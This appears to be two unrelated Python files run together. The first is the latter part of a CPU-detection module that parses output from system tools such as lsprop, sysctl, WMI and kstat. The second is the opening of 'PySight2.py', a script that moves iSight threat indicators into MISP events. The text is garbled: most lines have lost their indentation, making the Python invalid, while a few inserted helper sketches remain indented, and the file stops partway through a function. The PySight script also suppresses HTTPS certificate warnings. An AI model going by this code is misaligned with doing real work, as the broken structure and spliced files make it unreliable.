# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcdef')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : is_bit_set(left, 0),
'fpu' : is_bit_set(left, 1),
'slb' : is_bit_set(left, 2),
'run' : is_bit_set(left, 3),
#'reserved' : is_bit_set(left, 4),
'dabr' : is_bit_set(left, 5),
'ne' : is_bit_set(left, 6),
'wtr' : is_bit_set(left, 7),
# Byte 1
'mcr' : is_bit_set(left, 8),
'dsisr' : is_bit_set(left, 9),
'lp' : is_bit_set(left, 10),
'ri' : is_bit_set(left, 11),
'dabrx' : is_bit_set(left, 12),
'sprg3' : is_bit_set(left, 13),
'rislb' : is_bit_set(left, 14),
'pp' : is_bit_set(left, 15),
# Byte 2
'vpm' : is_bit_set(left, 16),
'dss_2.05' : is_bit_set(left, 17),
#'reserved' : is_bit_set(left, 18),
'dar' : is_bit_set(left, 19),
#'reserved' : is_bit_set(left, 20),
'ppr' : is_bit_set(left, 21),
'dss_2.02' : is_bit_set(left, 22),
'dss_2.06' : is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : is_bit_set(left, 24),
'ugr_in_dscr' : is_bit_set(left, 25),
#'reserved' : is_bit_set(left, 26),
#'reserved' : is_bit_set(left, 27),
#'reserved' : is_bit_set(left, 28),
#'reserved' : is_bit_set(left, 29),
#'reserved' : is_bit_set(left, 30),
#'reserved' : is_bit_set(left, 31),
# Byte 4
'sso_2.06' : is_bit_set(right, 0),
#'reserved' : is_bit_set(right, 1),
#'reserved' : is_bit_set(right, 2),
#'reserved' : is_bit_set(right, 3),
#'reserved' : is_bit_set(right, 4),
#'reserved' : is_bit_set(right, 5),
#'reserved' : is_bit_set(right, 6),
#'reserved' : is_bit_set(right, 7),
# Byte 5
'le' : is_bit_set(right, 8),
'cfar' : is_bit_set(right, 9),
'eb' : is_bit_set(right, 10),
'lsq_2.07' : is_bit_set(right, 11),
#'reserved' : is_bit_set(right, 12),
#'reserved' : is_bit_set(right, 13),
#'reserved' : is_bit_set(right, 14),
#'reserved' : is_bit_set(right, 15),
# Byte 6
'dss_2.07' : is_bit_set(right, 16),
#'reserved' : is_bit_set(right, 17),
#'reserved' : is_bit_set(right, 18),
#'reserved' : is_bit_set(right, 19),
#'reserved' : is_bit_set(right, 20),
#'reserved' : is_bit_set(right, 21),
#'reserved' : is_bit_set(right, 22),
#'reserved' : is_bit_set(right, 23),
# Byte 7
#'reserved' : is_bit_set(right, 24),
#'reserved' : is_bit_set(right, 25),
#'reserved' : is_bit_set(right, 26),
#'reserved' : is_bit_set(right, 27),
#'reserved' : is_bit_set(right, 28),
#'reserved' : is_bit_set(right, 29),
#'reserved' : is_bit_set(right, 30),
#'reserved' : is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
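# Sketch of the hex handling above (hypothetical helper, not used elsewhere): after the
# 'ibm,pa-features' label has been removed, the lsprop output is stripped down to hex digits
# and read as consecutive 32-bit words, which is what the 'left'/'right' values in
# _get_cpu_info_from_ibm_pa_features() represent.
def _example_hex_words(hex_text):
    digits = ''.join(c for c in hex_text.lower() if c in '0123456789abcdef')
    return [int(digits[i:i + 8], 16) for i in range(0, len(digits) - 7, 8)]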
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the output into key/value pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = to_hz_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id' : value.get('Manufacturer'),
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id()
# Get the CPU arch and bits
raw_arch_string = DataSource.winreg_raw_arch_string()
arch, bits = parse_arch(raw_arch_string)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = to_hz_string(hz_actual)
# Get the advertised CPU Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 6),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
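# Note on the registry feature bitmask above (illustrative helper, not used elsewhere): the
# mask is built as 0x80000000 >> bit, so is_set(0) tests the most significant bit and
# is_set(31) tests the least significant one.
def _example_registry_bit_mask(bit):
    # e.g. 0 -> 0x80000000, 31 -> 0x1
    return 0x80000000 >> bit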
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = to_hz_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def CopyNewFields(info, new_info):
keys = [
'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
'l2_cache_associativity', 'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
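# Usage sketch for CopyNewFields() with made-up values: missing fields are filled in from the
# new source, and flag lists are merged rather than overwritten.
def _example_copy_new_fields():
    info = {'brand': 'Example CPU', 'flags': ['sse']}
    CopyNewFields(info, {'vendor_id': 'ExampleVendor', 'flags': ['sse2']})
    # info is now {'brand': 'Example CPU', 'flags': ['sse', 'sse2'], 'vendor_id': 'ExampleVendor'}
    return info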
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'raw_arch_string' : DataSource.raw_arch_string,
}
# Try the Windows wmic
CopyNewFields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
CopyNewFields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
CopyNewFields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
CopyNewFields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
CopyNewFields(info, _get_cpu_info_from_lscpu())
# Try sysctl
CopyNewFields(info, _get_cpu_info_from_sysctl())
# Try kstat
CopyNewFields(info, _get_cpu_info_from_kstat())
# Try dmesg
CopyNewFields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
CopyNewFields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
CopyNewFields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
CopyNewFields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
CopyNewFields(info, _get_cpu_info_from_cpuid())
return info
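# Usage sketch: get_cpu_info() only includes the fields that the available sources could
# provide on this platform, so callers should treat every key as optional.
def _example_print_brand():
    info = get_cpu_info()
    print(info.get('brand', 'unknown'), info.get('hz_advertised', ''))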
# Make sure we are running on a supported system
def _check_arch():
arch, bits = parse_arch(DataSource.raw_arch_string)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64']:
raise Exception("py-cpuinfo currently only works on X86 and some PPC and ARM CPUs.")
def main():
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = get_cpu_info()
if info:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version', '')))
print('Vendor ID: {0}'.format(info.get('vendor_id', '')))
print('Hardware Raw: {0}'.format(info.get('hardware', '')))
print('Brand: {0}'.format(info.get('brand', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Hz Advertised Raw: {0}'.format(info.get('hz_advertised_raw', '')))
print('Hz Actual Raw: {0}'.format(info.get('hz_actual_raw', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Raw Arch String: {0}'.format(info.get('raw_arch_string', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
else:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if __name__ == '__main__':
from multiprocessing import freeze_support
freeze_support()
main()
else:
_check_arch()
PySight2.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sep 20, 2016
Modified: May 2020
@author: deralexxx
Script to pull iocs from iSight and push them to MISP
Modified by: Douglas Molina
Alexander Jaeger
See CHANGELOG.md for history
"""
import datetime
import email.utils
import hashlib
import hmac
import json
import os
from pymisp import ExpandedPyMISP, MISPEvent, MISPObject
#from pymisp import PyMISP, MISPEvent, MISPObject
import requests
import sys
import threading
import time
import urllib.parse
import urllib3
# Read the config file.
import PySight_settings
# Import our own iSight report model.
from model.pySightReport import pySightReport
# Suppress insecure HTTPS request warnings.
urllib3.disable_warnings()
# Error handling function.
def error_handling(e, a_string):
"""
:param e:
:type e:
:param a_string:
:type a_string:
:return:
:rtype:
"""
if hasattr(e, 'message'):
PySight_settings.logger.error('%s %s', a_string, e.message)
import traceback
PySight_settings.logger.debug('1 %s', e.__doc__)
PySight_settings.logger.debug('2 %s', sys.exc_info())
PySight_settings.logger.debug('3 %s', sys.exc_info()[0])
PySight_settings.logger.debug('4 %s', sys.exc_info()[1])
#PySight_settings.logger.debug('5 %s', sys.exc_info()[2], 'Sorry I mean line...',
# traceback.tb_lineno(sys.exc_info()[2]))
ex_type, ex, tb = sys.exc_info()
PySight_settings.logger.debug('6 %s', traceback.print_tb(tb))
return sys, traceback
# This function is not used!
def misp_delete_events(a_start, a_end, a_misp_instance):
"""
:param a_start:
:type a_start:
:param a_end:
:type a_end:
:param a_misp_instance:
:type a_misp_instance:
:return:
:rtype:
"""
print(a_start)
print(a_end)
try:
for i in range(a_start, a_end, 1):
print(i)
a_misp_instance.delete_event(i)
return True
except TypeError as e:
print("TypeError error: %s", e.message)
return False
except Exception:
print("Unexpected error: %s", sys.exc_info())
return True
# Update an existing MISP event.
def update_misp_event(misp_instance, event, isight_alert):
# Update attributes based on the iSight report.
#
# Ideas of Alex not implemented:
# Use expanded networkIdentifier as a comment.
# Create attributes and use object relationships for iSight fields that have no corresponding MISP object attribute.
#
# Unused iSight fields: observationTime
PySight_settings.logger.debug('Updating the event %s', event)
# Verify that misp_instance is of the correct type
#if not isinstance(misp_instance, PyMISP):
if not isinstance(misp_instance, ExpandedPyMISP):
PySight_settings.logger.error('Parameter misp_instance is not a PyMISP object')
return False
# Determine whether the to_ids flag shall be set.
if isight_alert.emailIdentifier == 'Attacker' or isight_alert.emailIdentifier == 'Compromised':
email_ids = True
else:
email_ids = False
if isight_alert.fileIdentifier == 'Attacker' or isight_alert.fileIdentifier == 'Compromised':
file_ids = True
elif isight_alert.intelligenceType == 'malware':
file_ids = True
else:
file_ids = False
if isight_alert.networkIdentifier == 'Attacker' or isight_alert.networkIdentifier == 'Compromised':
network_ids = True
else:
network_ids = False
# Use malwareFamily as the default comment.
if isight_alert.malwareFamily:
default_comment = isight_alert.malwareFamily
else:
default_comment = ''
# If the alert contains email indicators, create an email object.
if isight_alert.emailIdentifier:
# If emailLanguage is provided, add it to the default comment.
if isight_alert.emailLanguage:
add_comment = 'Email language: ' + isight_alert.emailLanguage
if default_comment == '':
email_comment = add_comment
else:
email_comment = default_comment + '; ' + add_comment
else:
email_comment = default_comment
# Create the object.
email_object = MISPObject('email')
email_object.comment = email_comment
# Add attributes to the object.
if isight_alert.senderAddress:
email_object.add_attribute('from', value=isight_alert.senderAddress, to_ids=email_ids)
if isight_alert.senderName:
email_object.add_attribute('from-display-name', value=isight_alert.senderName, to_ids=False)
if isight_alert.sourceIP:
email_object.add_attribute('ip-src', value=isight_alert.sourceIP, to_ids=email_ids)
if isight_alert.subject:
email_object.add_attribute('subject', value=isight_alert.subject, to_ids=False)
if isight_alert.recipient:
email_object.add_attribute('to', value=isight_alert.recipient, to_ids=False)
if isight_alert.senderDomain:
domain_attribute = event.add_attribute(category='Network activity', type='domain',
value=isight_alert.senderDomain, to_ids=False)
email_object.add_reference(domain_attribute.uuid, 'derived-from', comment='Email source domain')
# Lastly, add the object to the event.
event.add_object(email_object)
# If the report contains an MD5 hash, create a file object.
if isight_alert.md5:
# If a file description is given, add it to the default comment.
if isight_alert.description:
add_comment = isight_alert.description
if default_comment == '':
file_comment = add_comment
else:
file_comment = default_comment + '; ' + add_comment
else:
file_comment = default_comment
# Create the object.
file_object = MISPObject('file')
file_object.comment = file_comment
# Add attributes to the object.
file_object.add_attribute('md5', value=isight_alert.md5, to_ids=file_ids)
if isight_alert.sha1:
file_object.add_attribute('sha1', value=isight_alert.sha1, to_ids=file_ids)
if isight_alert.sha256:
file_object.add_attribute('sha256', value=isight_alert.sha256, to_ids=file_ids)
if isight_alert.fileName and not isight_alert.fileName == 'UNAVAILABLE' and \
not isight_alert.fileName.upper() == 'UNKNOWN':
# Don't use filenames for detection.
file_object.add_attribute('filename', value=isight_alert.fileName, to_ids=False)
if isight_alert.fileSize:
# Don't use file size for detection.
file_object.add_attribute('size-in-bytes', value=isight_alert.fileSize, to_ids=False)
if isight_alert.fuzzyHash:
file_object.add_attribute('ssdeep', value=isight_alert.fuzzyHash, to_ids=file_ids)
if isight_alert.fileType and not isight_alert.fileType == 'fileType':
# Don't use file type for detection.
file_object.add_attribute('text', value=isight_alert.fileType, to_ids=False)
if isight_alert.fileCompilationDateTime:
# Convert the epoch timestamp to a human-readable ISO 8601 datetime.
compile_date = datetime.datetime.fromtimestamp(isight_alert.fileCompilationDateTime)
file_object.add_attribute('compilation-timestamp', value=str(compile_date), to_ids=False)
if isight_alert.filePath:
file_object.add_attribute('path', value=isight_alert.filePath, to_ids=False)
# Lastly, add the object to the event.
event.add_object(file_object)
# If the report contains a user agent string, create a user-agent attribute.
if isight_alert.userAgent:
event.add_attribute(category='Network activity', type='user-agent', value=isight_alert.userAgent,
to_ids=network_ids, comment=default_comment)
# If the report contains an ASN, create an AS attribute.
if isight_alert.asn:
# Don't use the ASN for detection.
event.add_attribute(category='Network activity', type='AS', value=isight_alert.asn, to_ids=False,
comment=default_comment)
# If the report contains a domain, create a hostname attribute (because iSight domain names are in fact hostnames).
if isight_alert.domain:
# If an IP address is provided with a hostname, put the IP address in a comment, possibly in addition to the
# default network comment.
if isight_alert.ip:
add_comment = 'Resolves to ' + isight_alert.ip
if default_comment == '':
temp_comment = add_comment
else:
temp_comment = default_comment + '; ' + add_comment
else:
temp_comment = default_comment
# If a protocol is provided, also add it to the comment.
if isight_alert.protocol:
add_comment = isight_alert.protocol
if temp_comment == '':
host_comment = add_comment
else:
host_comment = temp_comment + '; ' + add_comment
else:
host_comment = temp_comment
# Add the attribute to the event. If a port is provided, use a combined attribute.
if isight_alert.port:
host_port = isight_alert.domain + '|' + isight_alert.port
new_attr = event.add_attribute(category='Network activity', type='hostname|port', value=host_port,
to_ids=network_ids, comment=host_comment)
else:
new_attr = event.add_attribute(category='Network activity', type='hostname', value=isight_alert.domain,
to_ids=network_ids, comment=host_comment)
if isight_alert.networkType == 'C&C':
# Add veris tag to attribute.
new_attr.add_tag('veris:action:malware:variety="C2"')
# If the report doesn't contain a hostname but contains an IP address, create an ip-src or ip-dst attribute.
# TODO: Is there a better way to determine whether it's a source or destination IP address?
elif isight_alert.ip:
# Add the protocol to the comment if it is provided by iSight.
if isight_alert.protocol:
add_comment = isight_alert.protocol
if default_comment == '':
ip_comment = add_comment
else:
ip_comment = default_comment + '; ' + add_comment
else:
ip_comment = default_comment
if isight_alert.networkIdentifier == 'Attacker':
# Might be source or destination, but likelihood of source is higher.
ip_type = 'ip-src'
if isight_alert.networkType == 'C&C':
ip_type = 'ip-dst'
elif isight_alert.networkIdentifier == 'Compromised':
# Might be source or destination, but likelihood of destination is higher.
ip_type = 'ip-dst'
elif isight_alert.networkIdentifier == 'Related':
# Might be source or destination, but likelihood of source is higher.
ip_type = 'ip-src'
elif isight_alert.networkIdentifier == 'Victim':
# Might be source or destination, but likelihood of destination is higher.
ip_type = 'ip-dst'
else:
# Might be source or destination, but likelihood of source is higher.
ip_type = 'ip-src'
if isight_alert.port:
# If a port is provided, it's likely a destination IP address.
ip_type = 'ip-dst'
type_combo = ip_type + '|port'
ip_port = isight_alert.ip + '|' + isight_alert.port
new_attr = event.add_attribute(category='Network activity', type=type_combo, value=ip_port,
to_ids=network_ids, comment=ip_comment)
else:
new_attr = event.add_attribute(category='Network activity', type=ip_type, value=isight_alert.ip,
to_ids=network_ids, comment=ip_comment)
if isight_alert.networkType == 'C&C':
# Add veris tag to attribute.
new_attr.add_tag('veris:action:malware:variety="C2"')
# If the report contains a domain registrant email address, then create a whois attribute.
if isight_alert.registrantEmail:
whois_object = MISPObject('whois')
whois_object.comment = default_comment
